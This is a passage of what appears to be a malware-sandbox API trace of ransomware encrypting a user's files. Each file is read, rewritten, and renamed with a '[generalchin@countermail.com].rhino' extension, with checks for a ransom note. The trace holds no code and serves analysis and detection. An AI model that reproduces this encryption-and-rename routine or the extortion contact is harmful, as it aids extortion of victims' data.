(in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73a470 | out: hHeap=0x6d0000) returned 1 [0104.319] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x75ef78 [0104.319] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73aab8 | out: hHeap=0x6d0000) returned 1 [0104.320] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x73a470 [0104.320] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0104.320] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x75ef78 [0104.320] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73a470 | out: hHeap=0x6d0000) returned 1 [0104.320] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x760f40 [0104.320] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0104.320] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x763ed8 [0104.320] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x760f40 | out: hHeap=0x6d0000) returned 1 [0104.321] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x73c0b8 [0104.322] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x763ed8 | out: hHeap=0x6d0000) returned 1 [0104.322] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa028) returned 0x75ef78 [0104.322] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73c0b8 | out: hHeap=0x6d0000) returned 1 [0104.322] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf02a) returned 0x73c0b8 [0104.323] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0104.324] WriteFile (in: hFile=0x104, lpBuffer=0x73c0c0*, nNumberOfBytesToWrite=0xe2e9, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x73c0c0*, lpNumberOfBytesWritten=0x2cfa04*=0xe2e9, lpOverlapped=0x0) returned 1 [0104.325] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73c0b8 | out: hHeap=0x6d0000) returned 1 [0104.325] UnlockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xe2e9, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0104.325] CloseHandle (hObject=0x104) returned 1 [0104.330] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x72a920 [0104.330] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0) returned 0x77f4a0 [0104.330] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0104.330] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\tHkEVoRBe9H2c1YrZiU.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\thkevorbe9h2c1yrziu.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\tHkEVoRBe9H2c1YrZiU.m4a.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\thkevorbe9h2c1yrziu.m4a.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0104.332] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77f4a0 | out: hHeap=0x6d0000) returned 1 [0104.332] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73a2e8 | out: hHeap=0x6d0000) returned 1 [0104.332] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72bfe8 | out: hHeap=0x6d0000) returned 1 [0104.332] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x72a920 [0104.332] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0104.332] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x708d18 [0104.332] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x75ef78 [0104.332] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0104.332] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0104.332] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0104.333] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\tykbhefC09YpuJ6GZ.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\tykbhefc09ypuj6gz.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0104.333] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0xea32 [0104.333] LockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xeb52, nNumberOfBytesToLockHigh=0x0) returned 1 [0104.333] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0104.333] ReadFile (in: hFile=0x104, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0104.335] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.337] ReadFile (in: hFile=0x104, lpBuffer=0x9b0040, nNumberOfBytesToRead=0xea32, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0xea32, lpOverlapped=0x0) returned 1 [0104.338] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0104.338] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0104.338] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0104.338] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e74c8 [0104.338] GetLastError () returned 0x0 [0104.339] SetLastError (dwErrCode=0x0) [0104.339] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0104.339] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xea55) returned 0x72bfe8 [0104.339] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e74c8 | out: hHeap=0x6d0000) returned 1 [0104.339] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x73aa48 [0104.339] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x73ab50 [0104.339] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73aa48 | out: hHeap=0x6d0000) returned 1 [0104.339] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.339] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0104.339] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b828 [0104.339] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0104.339] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0104.339] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0104.339] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b828 [0104.339] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0104.339] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0104.339] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0104.339] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df110 [0104.339] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0104.340] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df0f8 [0104.340] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0104.340] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0104.340] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df0f8 | out: hHeap=0x6d0000) returned 1 [0104.340] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0104.340] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0104.340] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0104.340] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0104.340] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e74c8 [0104.340] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0104.340] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 [0104.340] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e74c8 | out: hHeap=0x6d0000) returned 1 [0104.340] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x73aa48 [0104.340] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0104.340] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x73acd8 [0104.340] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73aa48 | out: hHeap=0x6d0000) returned 1 [0104.340] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x73adb8 [0104.340] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73acd8 | out: hHeap=0x6d0000) returned 1 [0104.340] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x73af00 [0104.340] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73adb8 | out: hHeap=0x6d0000) returned 1 [0104.340] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x73b0e8 [0104.340] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73af00 | out: hHeap=0x6d0000) returned 1 [0104.340] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x73b3b8 [0104.341] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73b0e8 | out: hHeap=0x6d0000) returned 1 [0104.341] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x73acd8 [0104.341] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73b3b8 | out: hHeap=0x6d0000) returned 1 [0104.341] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x73b320 [0104.341] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73acd8 | out: hHeap=0x6d0000) returned 1 [0104.341] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x75ef78 [0104.341] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73b320 | out: hHeap=0x6d0000) returned 1 [0104.341] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x75fd90 [0104.341] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0104.341] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x7612d0 [0104.341] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75fd90 | out: hHeap=0x6d0000) returned 1 [0104.341] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x763298 [0104.341] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7612d0 | out: hHeap=0x6d0000) returned 1 [0104.342] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x766230 [0104.343] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x763298 | out: hHeap=0x6d0000) returned 1 [0104.343] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x75ef78 [0104.343] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x766230 | out: hHeap=0x6d0000) returned 1 [0104.343] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa028) returned 0x73c0b8 [0104.344] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0104.345] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf02a) returned 0x74c388 [0104.346] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73c0b8 | out: hHeap=0x6d0000) returned 1 [0104.347] WriteFile (in: hFile=0x104, lpBuffer=0x74c3a0*, nNumberOfBytesToWrite=0xeb52, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x74c3a0*, lpNumberOfBytesWritten=0x2cfa04*=0xeb52, lpOverlapped=0x0) returned 1 [0104.347] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x74c388 | out: hHeap=0x6d0000) returned 1 [0104.347] UnlockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xeb52, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0104.347] CloseHandle (hObject=0x104) returned 1 [0104.394] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x73aa48 [0104.394] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd6) returned 0x73acd8 [0104.394] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73aa48 | out: hHeap=0x6d0000) returned 1 [0104.395] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\tykbhefC09YpuJ6GZ.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\tykbhefc09ypuj6gz.odt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\tykbhefC09YpuJ6GZ.odt.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\tykbhefc09ypuj6gz.odt.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0104.396] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73acd8 | out: hHeap=0x6d0000) returned 1 [0104.396] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73ab50 | out: hHeap=0x6d0000) returned 1 [0104.396] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72bfe8 | out: hHeap=0x6d0000) returned 1 [0104.396] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x708d18 [0104.396] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0104.396] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x72a920 [0104.396] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x75ef78 [0104.396] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0104.396] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0104.396] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0104.396] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\v4NVTaF zeyByjM.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\v4nvtaf zeybyjm.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0104.397] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x26ee [0104.397] LockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x280e, nNumberOfBytesToLockHigh=0x0) returned 1 [0104.397] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0104.397] ReadFile (in: hFile=0x104, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0104.399] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.399] ReadFile (in: hFile=0x104, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x26ee, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x26ee, lpOverlapped=0x0) returned 1 [0104.399] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0104.399] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0104.399] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0104.399] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e74c8 [0104.399] GetLastError () returned 0x0 [0104.400] SetLastError (dwErrCode=0x0) [0104.400] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0104.400] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2711) returned 0x75ef78 [0104.400] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e74c8 | out: hHeap=0x6d0000) returned 1 [0104.400] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x761698 [0104.400] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x7617a0 [0104.400] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x761698 | out: hHeap=0x6d0000) returned 1 [0104.400] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.400] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0104.400] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b828 [0104.400] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0104.400] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0104.400] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0104.400] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b828 [0104.400] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0104.400] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0104.401] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0104.401] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df0f8 [0104.401] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0104.401] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df110 [0104.401] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df0f8 | out: hHeap=0x6d0000) returned 1 [0104.401] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0104.401] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0104.401] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0104.401] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0104.401] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0104.401] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0104.401] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e74c8 [0104.401] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0104.401] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x72a920 [0104.401] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e74c8 | out: hHeap=0x6d0000) returned 1 [0104.401] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x761698 [0104.401] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0104.401] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x761928 [0104.401] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x761698 | out: hHeap=0x6d0000) returned 1 [0104.401] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x761a08 [0104.402] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x761928 | out: hHeap=0x6d0000) returned 1 [0104.402] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x761b50 [0104.402] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x761a08 | out: hHeap=0x6d0000) returned 1 [0104.402] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x761d38 [0104.402] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x761b50 | out: hHeap=0x6d0000) returned 1 [0104.402] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x762008 [0104.402] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x761d38 | out: hHeap=0x6d0000) returned 1 [0104.402] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x761928 [0104.402] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x762008 | out: hHeap=0x6d0000) returned 1 [0104.404] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x761f70 [0104.405] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x761928 | out: hHeap=0x6d0000) returned 1 [0104.405] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x7628d8 [0104.405] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x761f70 | out: hHeap=0x6d0000) returned 1 [0104.405] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x7636f0 [0104.405] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7628d8 | out: hHeap=0x6d0000) returned 1 [0104.405] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x764c30 [0104.405] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7636f0 | out: hHeap=0x6d0000) returned 1 [0104.405] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x761928 [0104.405] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x764c30 | out: hHeap=0x6d0000) returned 1 [0104.405] WriteFile (in: hFile=0x104, lpBuffer=0x761940*, nNumberOfBytesToWrite=0x280e, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x761940*, lpNumberOfBytesWritten=0x2cfa04*=0x280e, lpOverlapped=0x0) returned 1 [0104.406] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x761928 | out: hHeap=0x6d0000) returned 1 [0104.406] UnlockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x280e, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0104.406] CloseHandle (hObject=0x104) returned 1 [0104.408] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x72a920 [0104.408] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd6) returned 0x761698 [0104.408] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0104.409] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\v4NVTaF zeyByjM.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\v4nvtaf zeybyjm.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\v4NVTaF zeyByjM.m4a.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\v4nvtaf zeybyjm.m4a.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0104.410] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x761698 | out: hHeap=0x6d0000) returned 1 [0104.410] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7617a0 | out: hHeap=0x6d0000) returned 1 [0104.410] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0104.410] 